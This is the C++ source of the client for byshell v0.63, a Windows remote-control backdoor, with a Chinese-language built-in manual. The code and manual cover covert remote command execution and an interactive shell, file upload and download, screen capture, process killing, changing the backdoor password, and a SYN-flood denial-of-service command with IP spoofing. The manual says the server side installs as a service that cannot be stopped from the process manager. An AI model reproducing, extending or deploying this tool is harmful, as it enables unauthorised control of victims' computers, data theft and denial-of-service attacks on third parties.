//byshell v0.63 cli
#include <stdio.h>
#include <iostream.h>
#pragma comment(lib, "ws2_32.lib")
#include <winsock2.h>
#include <stdlib.h>
#include <stdio.h>
// Shared client state.
char pwd[16] = "by";        // password field: copied verbatim into bytes 0-15 of every outgoing frame (default "by")
char buff[66000] = {0};     // one frame: 32-byte header (length at bytes 28-31) followed by up to 65536 payload bytes, plus slack
char ip[31] = {0};          // server address exactly as typed by the operator
HANDLE filefp;              // local file currently open for a get/put/screen transfer
unsigned int packnum = 0;   // sequence number of the last 4000-byte transfer packet handled

// Turns operator input, or the server's last reply (workbuff/workbufflen),
// into the next request payload; stores its length in *psendlength and
// returns the state for the next round.
char work(char *workbuff, unsigned int workbufflen, char workflag, int *psendlength);

// Prints the built-in manual.
void helpview(void);
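// Reads one line from stdin into buf (at most size-1 characters), drains
// the remainder of an over-long line so it cannot leak into the next
// prompt, and strips the trailing "\n" / "\r\n".  buf is always
// NUL-terminated; on EOF or read error it is left empty.
static void read_console_line(char *buf, size_t size) {
    if (size == 0) return;
    buf[0] = '\0';
    if (fgets(buf, (int)size, stdin) == NULL) return;
    size_t len = strlen(buf);
    if (len == size - 1 && buf[len - 1] != '\n') {
        int c;
        while ((c = getchar()) != EOF && c != '\n') { }
    }
    while (len > 0 && (buf[len - 1] == '\n' || buf[len - 1] == '\r')) buf[--len] = '\0';
}

// Collects one reply frame into the global buff: reads until the 32-byte
// header is complete, then until the total length announced at bytes 28-31
// has arrived (TCP may split a frame across several recv() calls).
// Returns the number of bytes received, or -1 on EOF / socket error / an
// announced length outside [32, 65536].  The length is server-controlled,
// so it is range-checked before it is used as a loop bound.
static int recv_frame(SOCKET sock) {
    const int hdr = 32;
    const int maxframe = 65536;
    int recvlen = 0;
    int duelen = hdr;   // until the header is in, only require the header
    int have_hdr = 0;
    memset(buff, 0, maxframe);
    while (recvlen < duelen) {
        int got = recv(sock, buff + recvlen, maxframe - recvlen, 0);
        if (got <= 0) {
            printf("connection closed or recv failed\n");
            return -1;
        }
        recvlen += got;
        if (!have_hdr && recvlen >= hdr) {
            have_hdr = 1;
            memcpy(&duelen, buff + 28, 4);
            if (duelen < hdr || duelen > maxframe) {
                printf("fatal error: bad frame length from server\n");
                return -1;
            }
        }
    }
    return recvlen;
}

// Client entry point.  Asks for the server address and password, connects,
// then loops forever: work() builds the next request payload, the 32-byte
// header is prepended and sent, and the reply frame is collected for the
// next round.  Returns non-zero on any socket or protocol failure.
//
// Frame layout as built here: bytes 0-15 password (fixed width, not
// necessarily NUL-terminated), 16-27 zero (their meaning to the server is
// not visible in this file), 28-31 total frame length as a native-endian
// int, 32.. payload.  Replies are assumed to use the same header.
//
// SECURITY NOTE: the password and all traffic travel over plain TCP with
// no encryption and no server authentication; anyone on the path can read
// or replay them.  Every value taken from a reply is treated as untrusted.
int main(void) {
    enum { HDR_LEN = 32 };

    printf("please input the server ip address\n");
    read_console_line(ip, sizeof ip);
    printf("%s will be connected\n", ip);

    WSADATA wsaData;
    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
        printf("WSAStartup failed\n");
        return 1;
    }
    unsigned long addr = inet_addr(ip);
    if (addr == INADDR_NONE) {
        printf("invalid ip address: %s\n", ip);
        WSACleanup();
        return 1;
    }
    SOCKET sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == INVALID_SOCKET) {
        printf("socket() failed\n");
        WSACleanup();
        return 1;
    }
    // connect() chooses the local address/port itself, so the explicit
    // bind(INADDR_ANY, 0) the old code performed is unnecessary.
    sockaddr_in srvaddr;
    memset(&srvaddr, 0, sizeof srvaddr);
    srvaddr.sin_family = AF_INET;
    srvaddr.sin_port = htons(138);   // fixed server port (the NetBIOS datagram port number; the server presumably listens there)
    srvaddr.sin_addr.S_un.S_addr = addr;
    if (connect(sock, (struct sockaddr *)&srvaddr, sizeof srvaddr) == SOCKET_ERROR) {
        printf("connect failed,check your network and remote ip.");
        closesocket(sock);
        WSACleanup();
        return 1;
    }

    printf("input the password(the default one is \'by\')\n");
    char pwdline[64] = {0};
    read_console_line(pwdline, sizeof pwdline);   // bounded read; gets() could overflow pwd[16]
    if (pwdline[0] != '\0') {
        // Only the first 16 bytes are ever sent; a 16-character password
        // fills the field with no terminator and is sent as-is below.
        strncpy(pwd, pwdline, sizeof pwd);
    }
    // An empty line keeps the default "by" rather than sending an empty password.

    char workflag = 0;
    int sendlength = 65536;   // always overwritten by work() before use
    int recvlen = 0;
    for (;;) {
        strncpy(buff, pwd, 16);   // re-copied each round: "chpass" may have changed pwd
        // Payload length for work(); 0 before the first reply (recvlen is 0 then),
        // instead of the unsigned wrap-around the old subtraction produced.
        unsigned int payloadlen = (recvlen >= HDR_LEN) ? (unsigned int)(recvlen - HDR_LEN) : 0u;
        workflag = work(buff + HDR_LEN, payloadlen, workflag, &sendlength);
        if (sendlength < 0 || sendlength > (int)sizeof buff - HDR_LEN) {
            printf("fatal error: request too large\n");
            break;
        }
        sendlength += HDR_LEN;
        memcpy(buff + 28, &sendlength, 4);
        if (send(sock, buff, sendlength, 0) != sendlength) {
            printf("fatal error in transmission\n");
            break;
        }
        recvlen = recv_frame(sock);
        if (recvlen < 0) break;
    }
    closesocket(sock);
    WSACleanup();
    return 1;
}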
//__finally{closesocket(sock);}
// Request builders and reply handlers: work() turns operator input or the server's last reply into the next payload.
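// Reads one operator line into buf (at most size-1 characters), drains the
// remainder of an over-long line, and strips the trailing "\n" / "\r\n".
// buf is always NUL-terminated; on EOF or read error it is left empty.
// Replaces the unbounded gets() calls of the old code.
static void read_command_line(char *buf, size_t size) {
    if (size == 0) return;
    buf[0] = '\0';
    if (fgets(buf, (int)size, stdin) == NULL) return;
    size_t len = strlen(buf);
    if (len == size - 1 && buf[len - 1] != '\n') {
        int c;
        while ((c = getchar()) != EOF && c != '\n') { }
    }
    while (len > 0 && (buf[len - 1] == '\n' || buf[len - 1] == '\r')) buf[--len] = '\0';
}

// The "#" prompt (the old lab1: label).  Clears workbuff, reads one
// operator command and translates it into the request payload, looping
// back to the prompt for HELP or a malformed command.  Sets *psendlength
// to the payload length and returns the state for the next round:
// 0 plain command (sent verbatim), 1 shell, 2 get, 3 put, 4 screen.
static char prompt_command(char *workbuff, int *psendlength) {
    for (;;) {
        memset(workbuff, 0, 65536);
        printf("#");
        read_command_line(workbuff, 65536);
        *psendlength = (int)strlen(workbuff);

        if (!strncmp(workbuff, "HELP", 4) || !strncmp(workbuff, "help", 4)) {
            helpview();
            continue;
        }
        if (!strncmp(workbuff, "shell", 5)) return 1;
        if (!strncmp(workbuff, "chpass", 6)) {
            // pwd is a fixed 16-byte field; a 16-character password leaves it unterminated by design.
            strncpy(pwd, workbuff + 6, 16);
            return 0;
        }
        // get\tLOCAL\tREMOTE : download REMOTE into LOCAL.
        if (!strncmp(workbuff, "get", 3)) {
            packnum = 0;
            char desfile[255] = {0};
            char srcfile[255] = {0};
            if (sscanf(workbuff, "get\t%254s\t%254s", desfile, srcfile) != 2) {   // widths bound the 255-byte buffers
                printf("usage: get<tab>local file<tab>remote file\n");
                continue;
            }
            filefp = CreateFile(desfile, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
            if (filefp == INVALID_HANDLE_VALUE) {
                printf("cannot create local file.\n");
                continue;
            }
            memset(workbuff + 3, 0, 514);   // payload becomes "get<remote path>"
            strcat(workbuff, srcfile);
            *psendlength = (int)strlen(workbuff);
            return 2;
        }
        // put\tREMOTE\tLOCAL : upload LOCAL to REMOTE.
        if (!strncmp(workbuff, "put", 3)) {
            packnum = 0;
            char desfile[255] = {0};
            char srcfile[255] = {0};
            if (sscanf(workbuff, "put\t%254s\t%254s", desfile, srcfile) != 2) {
                printf("usage: put<tab>remote file<tab>local file\n");
                continue;
            }
            filefp = CreateFile(srcfile, GENERIC_READ, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
            if (filefp == INVALID_HANDLE_VALUE) {
                printf("no such local file.\n");
                continue;
            }
            memset(workbuff + 3, 0, 514);   // payload becomes "put<remote path>"
            strcat(workbuff, desfile);
            *psendlength = (int)strlen(workbuff);
            return 3;
        }
        if (!strncmp(workbuff, "screen", 6)) {
            packnum = 0;
            // Fixed, predictable output path at the drive root (documented in the manual).
            filefp = CreateFile("c:\\remotedesktop.bmp", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
            if (filefp == INVALID_HANDLE_VALUE) {
                printf("cannot create c:\\remotedesktop.bmp\n");
                continue;
            }
            *psendlength = (int)strlen(workbuff);
            return 4;
        }
        return 0;   // anything else (cmd, pslist, SYN, ...) is sent verbatim
    }
}

// Builds the next request payload in workbuff.
//   workbuff     payload area of the frame (32 bytes into the global buff)
//   workbufflen  length of the server's last reply payload (0 on the first round)
//   workflag     state returned by the previous call: 0 prompt, 1 shell,
//                2 get in progress, 3 put in progress, 4 screen in progress
//   psendlength  out: payload length to send
// Returns the state for the next round.
//
// Transfer packets (states 2-4) are: 4-byte packet number, 1 type byte
// ('f' marks the final packet), then up to 4000 data bytes.  Everything
// read from workbuff came from the server and is treated as untrusted:
// lengths are checked before they feed WriteFile, and the packet number in
// a "redirect" is bounded before it becomes a file offset.
char work(char *workbuff, unsigned int workbufflen, char workflag, int *psendlength) {
    // Plain command: show the reply, then prompt for the next command.
    if (workflag == 0) {
        printf("%s", workbuff);   // server text is printed raw; no filtering of control/escape sequences
        return prompt_command(workbuff, psendlength);
    }

    // Interactive shell: forward each line with CRLF until "endshell".
    if (workflag == 1) {
        printf("%s", workbuff);
        memset(workbuff, 0, 65536);
        read_command_line(workbuff, 65536 - 3);   // leave room for the appended "\r\n"
        strcat(workbuff, "\r\n");
        *psendlength = (int)strlen(workbuff);
        // "endshell" is still sent to the server, but the state returns to the prompt.
        return strncmp(workbuff, "endshell", 8) == 0 ? 0 : 1;
    }

    // get: each reply is one data packet; acknowledge it or ask for a resend.
    if (workflag == 2) {
        unsigned int rcvpacknum = 0;
        memcpy(&rcvpacknum, workbuff, 4);
        if (!strncmp(workbuff, "no such file\n\0", 14) && packnum == 0) {
            CloseHandle(filefp);   // the (empty) local file created at the prompt is left behind, as before
            printf("no such file\n");
            memset(workbuff, 0, 65536);
            return prompt_command(workbuff, psendlength);
        }
        // Out-of-sequence packet: request packnum+1 again ("redirect" + wanted number).
        if (rcvpacknum != packnum + 1) {
            printf("packet dropped,redirecting");
            memset(workbuff, 0, 65536);
            strcpy(workbuff, "redirect");
            unsigned int wanted = packnum + 1;
            memcpy(workbuff + 8, &wanted, 4);
            *psendlength = 12;
            return 2;
        }
        if (workbufflen < 5) {
            // Fewer than header bytes: workbufflen-5 would wrap and WriteFile would read far past the packet.
            CloseHandle(filefp);
            printf("fatal error: short transfer packet\n");
            memset(workbuff, 0, 65536);
            return prompt_command(workbuff, psendlength);
        }
        DWORD byteswritten = 0;
        if (!WriteFile(filefp, workbuff + 5, workbufflen - 5, &byteswritten, 0) || byteswritten != workbufflen - 5) {
            printf("warning:file system error\n");
        }
        if (workbuff[4] != 'f') {
            packnum += 1;
            memset(workbuff, 0, 65536);
            unsigned int next = packnum + 1;   // acknowledge by naming the packet we expect next
            memcpy(workbuff, &next, 4);
            printf(".");
            *psendlength = 5;
            return 2;
        }
        printf("file downloaded.\n");
        CloseHandle(filefp);
        return prompt_command(workbuff, psendlength);
    }

    // put, resend request: the server names the packet it wants; re-read it from the file.
    if (workflag == 3 && strncmp(workbuff, "redirect", 8) == 0) {
        unsigned int reqpacknum = 0;
        memcpy(&reqpacknum, workbuff + 8, 4);
        memset(workbuff, 0, 65520);
        // reqpacknum is server-supplied: 0 would wrap packnum to UINT_MAX, and a large
        // value would wrap 4000*packnum past the 32-bit file offset SetFilePointer takes.
        if (reqpacknum == 0 || reqpacknum - 1 > 0x7FFFFFFFu / 4000u) {
            CloseHandle(filefp);
            printf("fatal error: bad redirect from server\n");
            return prompt_command(workbuff, psendlength);
        }
        packnum = reqpacknum - 1;
        SetFilePointer(filefp, 4000 * packnum, 0, FILE_BEGIN);
        DWORD bytesread = 0;
        if (!ReadFile(filefp, workbuff + 5, 4000, &bytesread, 0)) bytesread = 0;
        memcpy(workbuff, &reqpacknum, 4);
        if (bytesread == 4000) {
            packnum += 1;
            *psendlength = 4005;
            return 3;
        }
        workbuff[4] = 'f';   // short read: this is the last packet
        CloseHandle(filefp);
        *psendlength = 5 + (int)bytesread;
        return 0;
    }

    // put: the server acknowledges with the number of the packet it wants next.
    if (workflag == 3) {
        unsigned int reqpacknum = 0;
        memcpy(&reqpacknum, workbuff, 4);
        if (!strncmp(workbuff, "no privilege to write\n", 21) && packnum == 0) {
            CloseHandle(filefp);
            printf("no privilege to write\n");
            memset(workbuff, 0, 65536);
            return prompt_command(workbuff, psendlength);
        }
        if (!strncmp(workbuff, "file system error\n", 17)) {
            CloseHandle(filefp);
            printf("file system error\n");
            memset(workbuff, 0, 65536);
            return prompt_command(workbuff, psendlength);
        }
        if (reqpacknum != packnum + 1) {
            // Reported but not recovered (kept as in the original protocol).
            memset(workbuff, 0, 65536);
            strcpy(workbuff, "packet dropped\n");
            *psendlength = (int)strlen(workbuff);
            return 3;
        }
        DWORD bytesread = 0;
        if (!ReadFile(filefp, workbuff + 5, 4000, &bytesread, 0)) bytesread = 0;
        memcpy(workbuff, &reqpacknum, 4);
        if (bytesread == 4000) {
            packnum += 1;
            printf(".");
            *psendlength = 4005;
            return 3;
        }
        workbuff[4] = 'f';   // short read: this is the last packet
        CloseHandle(filefp);
        *psendlength = 5 + (int)bytesread;
        return 0;
    }

    // screen: like get, but a dropped packet aborts the transfer.
    if (workflag == 4) {
        unsigned int rcvpacknum = 0;
        memcpy(&rcvpacknum, workbuff, 4);
        if (rcvpacknum != packnum + 1) {
            // Kept as in the original: workbuff/psendlength are left untouched,
            // so the next round re-sends the stale payload with the old length.
            CloseHandle(filefp);
            printf("packet dropped\n");
            return 0;
        }
        if (workbufflen < 5) {
            CloseHandle(filefp);
            printf("fatal error: short transfer packet\n");
            memset(workbuff, 0, 65536);
            return prompt_command(workbuff, psendlength);
        }
        DWORD byteswritten = 0;
        if (!WriteFile(filefp, workbuff + 5, workbufflen - 5, &byteswritten, 0) || byteswritten != workbufflen - 5) {
            printf("warning:file system error\n");
        }
        printf(".");
        if (workbuff[4] != 'f') {
            packnum += 1;
            memset(workbuff, 0, 65536);
            unsigned int next = packnum + 1;
            memcpy(workbuff, &next, 4);
            *psendlength = 4;
            return 4;
        }
        CloseHandle(filefp);
        printf("OK\n");
        return prompt_command(workbuff, psendlength);
    }

    return 0;
}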
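// Prints the built-in manual, one line per entry.
// The text is kept byte-for-byte as shipped (including its pre-existing
// encoding artifacts) except for the put example, whose path contained
// "\f" (a form feed) instead of "\\f" and so printed a corrupted path.
void helpview(void) {
    static const char *const manual[] = {
        " BYshell v0.63",
        " author:b.y",
        " byshell v0.61A是一個完全SDK編寫的遠程控制軟件,作者允許此軟件及其源代碼自由傳播,但引用時應(yīng)注明原出處。在聯(lián)系作者并得到同意之前,不得將此軟件改編或刪選后用作商業(yè)用途,但可用作學習和私人用途。",
        " 本軟件部分功能僅僅支持NT以上的Wind0wZ系統(tǒng)。bycli.exe為客戶端(控制方),而byshell.exe為服務(wù)端(被控制端)。第一次使用時,在服務(wù)端執(zhí)行byshell.exe -install,以后當服務(wù)端上網(wǎng),byshell會以服務(wù)自動啟動,此服務(wù)不能在進程管理器中停止。要刪除服務(wù),在服務(wù)端使用byshell.exe -remove,byshell就會被清除。",
        " byshell v0.61A是一個穩(wěn)定版本,在文件傳輸,命令映射等功能上相比byshell v0.61有了很大的改進和提高,修正了已知的幾乎所有BUG和缺陷。",
        " 符號#是這個軟件的命令提示符。目前支持的命令:",
        "cmd 在此后跟你要執(zhí)行的cmd命令,注意:只能執(zhí)行一條單獨的命令。僅僅支持NT以上的Wind0wZ系統(tǒng)。",
        " eg. #cmddir c:\\winnt",
        "shell 輸入此命令后,進入交互的遠程cmd,直到鍵入endshell返回#提示符。僅僅支持NT以上的Wind0wZ系統(tǒng)。",
        "endshell 從shell狀態(tài)返回#提示符。",
        "chpass 改變后門密碼。默認為“by”。",
        " eg. #chpass123456",
        "byver 查看連接的服務(wù)端的版本,新舊版本的客戶服務(wù)端間交互時,可能有嚴重的兼容性問題。",
        "sysinfo 取得對方的基本系統(tǒng)信息。",
        "pslist 對方進程列表。",
        "pskill 殺死對方指定進程。在此后跟你要殺死的進程的PID(由pslist得到)。",
        " eg. #pskill972",
        "modlist 對方指定進程加載的所有DLL的列表。在此后跟你要查看的進程的PID(由pslist得到)。",
        " eg. #modlist972",
        "get 在此軟件的連接上下載遠程文件。命令格式:",
        " get <tab鍵> 本地保存文件名 <tab鍵> 遠程下載文件名",
        " eg. #get c:\\download\\file.txt d:\\sourcefile.txt",
        "put 在此軟件的連接上向遠程上傳文件。命令格式:",
        " put <tab鍵> 遠程保存文件名 <tab鍵> 本地上傳文件名",
        " eg. #put d:\\receive\\file.txt c:\\sourcefile.txt",   // was "\\receive\file.txt": \f is a form feed
        "screen 遠程截屏到本地,保存為“c:\\remotedesktop.bmp”文件,由此可查看遠程桌面。",
        " 搞笑功能,開懷一笑:",
        "popmsg 彈出信息框。",
        " eg. #popmsghello,are you all right?",
        "swapmouse 遠程鼠標左右鍵交換。",
        "storemouse 遠程鼠標左右鍵復原。",
        "hidesys 隱藏遠程桌面和任務(wù)欄。",
        "showsys 恢復遠程桌面和任務(wù)欄。",
        "",
        "警告:以下的SYN功能有一定的危險性,僅僅用做測試。如果用戶非法使用此功能攻擊合法站點,將自己承擔全部法律后果。",
        "SYN 使用服務(wù)端發(fā)起SYN洪水的拒絕服務(wù)攻擊測試。",
        // The original ended this entry with "\n" instead of endl; the loop's endl yields the same bytes.
        "參數(shù):SYN 測試對象 測試的分鐘數(shù) IP偽造類型(可選參數(shù),0是完全偽造,1是C段偽造,2是不偽造,默認為0) 攻擊對象端口(可選參數(shù),默認為80WWW端口) 使用的端口(可選參數(shù),0是隨機變化,默認為0)",
        "如果選擇了某個可選參數(shù),那么在它左邊的可選參數(shù)就必須被選擇,在它右邊的可選參數(shù)則可以忽略。",
        " eg. #SYN 172.18.1.5 15",
        " eg. #SYN 172.18.1.5 15 1",
        " eg. #SYN 172.18.1.5 15 1 445 12345",
        "queryDOS 查詢服務(wù)端SYN攻擊測試的詳細情況。",
        "endDOS 強制結(jié)束服務(wù)端的SYN作業(yè)。",
        "\n 由于作者是初學者,水平有限,程序一定存在很多BUG。謝謝各位朋友、前輩指教:",
        " 華東師大軟件學院04級 白遠方 baiyuanfan@163.com",
        "注:screen功能中用到的DDBtoDIB代碼來源為xfocus.net的網(wǎng)友hzzh,著作權(quán)歸他所有。",
        " 特別感謝在我寫這個小軟件時給了我很大幫助的gxisone(谷夕),glacier(黃鑫)和xfocus.net的所有朋友,是他們的支持使我這個初學者能夠克服困難和疑惑,最終完成這個程序。",
        "",
    };
    for (unsigned int i = 0; i < sizeof manual / sizeof manual[0]; ++i) {
        cout << manual[i] << endl;
    }
}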